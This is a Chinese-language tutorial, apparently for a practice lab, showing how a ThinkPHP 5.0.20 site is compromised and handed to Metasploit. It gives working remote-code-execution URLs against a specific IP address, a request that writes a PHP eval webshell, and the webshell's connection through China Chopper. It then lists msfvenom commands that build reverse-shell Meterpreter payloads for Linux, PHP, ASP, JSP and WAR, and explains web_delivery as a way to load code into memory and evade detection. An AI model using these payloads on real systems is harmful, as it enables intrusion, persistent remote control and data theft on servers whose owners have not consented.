19 MSF框架之linux攻击

简介: Thinkphp 5.0.20漏洞利用

靶场:Thinkphp 5.0.20

150.158.137.72:8081

 

 

漏洞利用payload

 

 

http://150.158.137.72:8081/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&
vars
[1][]=whoami


 image.pnghttp://150.158.137.72:8081/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_p
ut_contents
&vars[1][]=shell.php&vars[1][]=%3C?php%20@eval($_POST[ccc]);?%3E


image.png





 http://150.158.137.72:8081/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls


image.png


 shell.php访问成功

view-source:150.158.137.72:8081/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat shell.php


 image.png

 

访问index.php

view-source:150.158.137.72:8081/index.php

image.png



访问shell.php


image.png


菜刀连接

image.png


image.png


 image.png

 

 

MSF生成木马攻击上线webshell

生成可执行文件


linux

msfvenom
-p linux/x64/meterpreter/reverse_tcp lhost=<you host>-p
<
you port>-f elf -o muma.elf

php
:
msfvenom
-p php/meterpreter/reverse_tcp LHOST=<YourIPAddress>LPORT=<Your Port to
Connect On
>-f raw >shell php
asp
:
msfvenom
-a x86 -platform windows -p windows/meterpreter/reverse_tcp LHOST=<Your IP
Address
>LPORT=<Your Port to Connect On>-f aspx - o shell.aspx
jsp
:
msfvenom
-p java/jsp_shell reverse_tcp LHOST=<Your IPAddress>LPORT=<Your Port to
Connect On
>-fraw >shell jsp
war
:
msfvenom
-p java/jsp_shell_reverse_tcp LHOST=<Your IPAddress>LPORT=<Your Port to
Connect On
>-f war >shell.war

纯文本

 

将文件上传到webshell服务器

 

 

赋予执行权限

执行木马

上线到msf

 

 

利用python生成交互式shell

反弹shell ——直接访问就可以执行   上线到msf

php: msfvenom-p php/meterpreter/reverse_tcp LHOST= <Your IP Address> LPORT= <Your Port to Connect On> -f raw >shell php asp: msfvenom -a x86 -platform windows -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT= <Your Port to Connect On> -f aspx - o shell.aspx jsp: msfvenom -p java/jsp_shell reverse_tcp LHOST=<Your IP Address> LPORT= <Your Port to Connect On> -fraw >shell jsp war: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT= <Your Port to Connect On> -f war > shell.war

 

 

 

 

WEB_delivery上线到msf

当攻击者拥有部分受害者主机的控制权,但还没有拿到一个完整的shell时, web_delivery就派上用场

 

 

① web_delivery的主要目的是快速和受害者主机建立一条session.当受害者主机存在比如命令注入、远程命令执行等问题时,攻击者可以使用web_delivery生成的一条命令建立连接。
另外web_deliverypayload不会在受害者主机磁盘上写文件,而是直接将攻击者服务器上的代码加载到内存执行,有利于绕过检测。
③ web_delivery
支持php/python/powershell等多种脚本,使用不同的脚本的payload时需要通过set target 012来设置是使用php还是python还是powershell等。

search web_delivery


image.png 

 

http://150.158.137.72:8081/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=msf生成的payload(php -d all)


 

 

 

相关文章
|
3月前
|
安全 Linux 网络安全
Metasploit Pro 4.22.7-2025061201 (Linux, Windows) - 专业渗透测试框架
Metasploit Pro 4.22.7-2025061201 (Linux, Windows) - 专业渗透测试框架
100 3
Metasploit Pro 4.22.7-2025061201 (Linux, Windows) - 专业渗透测试框架
|
1月前
|
SQL 安全 Linux
Metasploit Pro 4.22.8-2025073001 (Linux, Windows) - 专业渗透测试框架
Metasploit Pro 4.22.8-2025073001 (Linux, Windows) - 专业渗透测试框架
73 0
|
4月前
|
安全 Unix Linux
Metasploit Pro 4.22.7-2025052201 (Linux, Windows) - 专业渗透测试框架
Metasploit Pro 4.22.7-2025052201 (Linux, Windows) - 专业渗透测试框架
109 5
Metasploit Pro 4.22.7-2025052201 (Linux, Windows) - 专业渗透测试框架
|
4月前
|
数据采集 安全 Linux
Metasploit Pro 4.22.7-2025051201 (Linux, Windows) - 专业渗透测试框架
Metasploit Pro 4.22.7-2025051201 (Linux, Windows) - 专业渗透测试框架
88 4
Metasploit Pro 4.22.7-2025051201 (Linux, Windows) - 专业渗透测试框架
|
4月前
|
Linux 网络安全 iOS开发
Metasploit Framework 6.4.63 (macOS, Linux, Windows) - 开源渗透测试框架
Metasploit Framework 6.4.63 (macOS, Linux, Windows) - 开源渗透测试框架
95 4
Metasploit Framework 6.4.63 (macOS, Linux, Windows) - 开源渗透测试框架
|
5月前
|
存储 安全 Linux
Metasploit Pro 4.22.7-2025040601 (Linux, Windows) - 专业渗透测试框架
Metasploit Pro 4.22.7-2025040601 (Linux, Windows) - 专业渗透测试框架
194 1
Metasploit Pro 4.22.7-2025040601 (Linux, Windows) - 专业渗透测试框架
|
5月前
|
Linux 网络安全 iOS开发
Metasploit Framework 6.4.55 (macOS, Linux, Windows) - 开源渗透测试框架
Metasploit Framework 6.4.55 (macOS, Linux, Windows) - 开源渗透测试框架
117 0
Metasploit Framework 6.4.55 (macOS, Linux, Windows) - 开源渗透测试框架
|
7月前
|
Linux 网络安全 iOS开发
Metasploit Framework 6.4.49 (macOS, Linux, Windows) - 开源渗透测试框架
Metasploit Framework 6.4.49 (macOS, Linux, Windows) - 开源渗透测试框架
101 0
Metasploit Framework 6.4.49 (macOS, Linux, Windows) - 开源渗透测试框架
|
9月前
|
Linux Shell 网络安全
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
本指南介绍如何利用 HTA 文件和 Metasploit 框架进行渗透测试。通过创建反向 shell、生成 HTA 文件、设置 HTTP 服务器和发送文件,最终实现对目标系统的控制。适用于教育目的,需合法授权。
234 9
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
|
9月前
|
安全 Ubuntu Linux
Metasploit Pro 4.22.6-2024111901 (Linux, Windows) - 专业渗透测试框架
Metasploit Pro 4.22.6-2024111901 (Linux, Windows) - 专业渗透测试框架
119 9
Metasploit Pro 4.22.6-2024111901 (Linux, Windows) - 专业渗透测试框架